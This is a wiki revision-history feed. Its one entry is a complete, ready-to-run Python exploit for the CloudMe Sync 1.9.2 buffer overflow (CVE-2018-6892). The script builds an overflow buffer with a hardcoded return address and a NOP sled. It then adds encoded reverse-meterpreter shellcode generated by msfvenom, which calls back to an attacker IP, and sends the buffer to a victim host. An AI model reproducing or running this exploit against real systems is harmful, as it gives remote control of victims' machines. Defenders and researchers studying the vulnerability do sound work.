<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-6892_CloudMe_Sync_1.9.2_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-6892 CloudMe Sync 1.9.2 遠程緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-6892_CloudMe_Sync_1.9.2_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-6892_CloudMe_Sync_1.9.2_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T06:34:10Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-6892_CloudMe_Sync_1.9.2_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1529&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python # CloudMe Sync 1.9.2 Remote Exploit # Written by r00tpgp @ http://www.r00tpgp.com # Usage: python CloudMe-1.9.2-Exploit.py &lt;victim-ip&gt; &lt;port&gt; #...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-6892_CloudMe_Sync_1.9.2_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1529&amp;oldid=prev"/>
		<updated>2021-04-11T02:07:39Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/python # CloudMe Sync 1.9.2 Remote Exploit # Written by r00tpgp @ http://www.r00tpgp.com # Usage: python CloudMe-1.9.2-Exploit.py &amp;lt;victim-ip&amp;gt; &amp;lt;port&amp;gt; #...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
# CloudMe Sync 1.9.2 Remote Exploit&lt;br /&gt;
# Written by r00tpgp @ http://www.r00tpgp.com&lt;br /&gt;
# Usage: python CloudMe-1.9.2-Exploit.py &amp;lt;victim-ip&amp;gt; &amp;lt;port&amp;gt;&lt;br /&gt;
# Spawns reverse meterpreter LHOST=192.168.0.68 LPORT=1990&lt;br /&gt;
# CVE: CVE-2018-6892&lt;br /&gt;
# CloudMe Installer: https://org.cloudme.com/en/sync&lt;br /&gt;
# Tested on Windows 7 32b SP1&lt;br /&gt;
&lt;br /&gt;
import sys, socket, time&lt;br /&gt;
 &lt;br /&gt;
host = sys.argv[1] # Recieve IP from user&lt;br /&gt;
port = int(sys.argv[2]) # Recieve Port from user&lt;br /&gt;
 &lt;br /&gt;
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b '&amp;quot;\x00\x0a\x0d'&lt;br /&gt;
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload&lt;br /&gt;
# No Arch selected, selecting Arch: x86 from the payload&lt;br /&gt;
# Found 10 compatible encoders&lt;br /&gt;
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai&lt;br /&gt;
# x86/shikata_ga_nai succeeded with size 360 (iteration=0)&lt;br /&gt;
# x86/shikata_ga_nai chosen with final size 360&lt;br /&gt;
# Payload size: 360 bytes&lt;br /&gt;
# Final size of python file: 1730 bytes&lt;br /&gt;
buf =  &amp;quot;&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xbd\xb6\xb3\x2c\xc1\xdb\xdd\xd9\x74\x24\xf4\x58\x2b&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xc9\xb1\x54\x83\xe8\xfc\x31\x68\x0f\x03\x68\xb9\x51&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xd9\x3d\x2d\x17\x22\xbe\xad\x78\xaa\x5b\x9c\xb8\xc8&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x28\x8e\x08\x9a\x7d\x22\xe2\xce\x95\xb1\x86\xc6\x9a&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x72\x2c\x31\x94\x83\x1d\x01\xb7\x07\x5c\x56\x17\x36&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xaf\xab\x56\x7f\xd2\x46\x0a\x28\x98\xf5\xbb\x5d\xd4&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xc5\x30\x2d\xf8\x4d\xa4\xe5\xfb\x7c\x7b\x7e\xa2\x5e&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x7d\x53\xde\xd6\x65\xb0\xdb\xa1\x1e\x02\x97\x33\xf7&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x5b\x58\x9f\x36\x54\xab\xe1\x7f\x52\x54\x94\x89\xa1&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xe9\xaf\x4d\xd8\x35\x25\x56\x7a\xbd\x9d\xb2\x7b\x12&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x7b\x30\x77\xdf\x0f\x1e\x9b\xde\xdc\x14\xa7\x6b\xe3&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xfa\x2e\x2f\xc0\xde\x6b\xeb\x69\x46\xd1\x5a\x95\x98&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xba\x03\x33\xd2\x56\x57\x4e\xb9\x3e\x94\x63\x42\xbe&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xb2\xf4\x31\x8c\x1d\xaf\xdd\xbc\xd6\x69\x19\xc3\xcc&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xce\xb5\x3a\xef\x2e\x9f\xf8\xbb\x7e\xb7\x29\xc4\x14&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x47\xd6\x11\x80\x4d\x40\x5a\xfd\x52\x32\x32\xfc\x52&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x35\x05\x89\xb5\x69\xd9\xda\x69\xc9\x89\x9a\xd9\xa1&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xc3\x14\x05\xd1\xeb\xfe\x2e\x7b\x04\x57\x06\x13\xbd&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xf2\xdc\x82\x42\x29\x99\x84\xc9\xd8\x5d\x4a\x3a\xa8&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x4d\xba\x5b\x52\x8e\x3a\xf6\x52\xe4\x3e\x50\x04\x90&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x3c\x85\x62\x3f\xbf\xe0\xf0\x38\x3f\x75\xc1\x33\x09&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xe3\x6d\x2c\x75\xe3\x6d\xac\x23\x69\x6e\xc4\x93\xc9&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x3d\xf1\xdc\xc7\x51\xaa\x48\xe8\x03\x1e\xdb\x80\xa9&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x79\x2b\x0f\x51\xac\x28\x48\xad\x32\x0c\xf1\xc6\xcc&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x10\x01\x17\xa7\x90\x51\x7f\x3c\xbf\x5e\x4f\xbd\x6a&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x37\xc7\x34\xfa\xf5\x76\x48\xd7\x58\x27\x49\xdb\x40&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x3e\xc4\x1c\x77\x3f\x26\x21\xa1\x06\x5c\x62\x71\x3d&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x6f\xd9\xd4\x14\xfa\x21\x4a\x66\x2f&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
# Return Address for Windows 7 32b SP1&lt;br /&gt;
ret = '\x25\xDF\xB8\x68'&lt;br /&gt;
&lt;br /&gt;
# NOP Padding&lt;br /&gt;
nop = '\x90'*20&lt;br /&gt;
 &lt;br /&gt;
# EIP Writing Pattern&lt;br /&gt;
pattern = &amp;quot;A&amp;quot;*1036 + ret + nop + buf # Our exploit together. Junk -&amp;amp;gt; Return Address -&amp;amp;gt; NOPS -&amp;amp;gt; Shellcode&lt;br /&gt;
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket&lt;br /&gt;
client.connect((host, port)) # Connect to user supplied port and IP address&lt;br /&gt;
client.send(pattern) # Send the user command with a variable length name&lt;br /&gt;
client.close() # Close the Connection&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>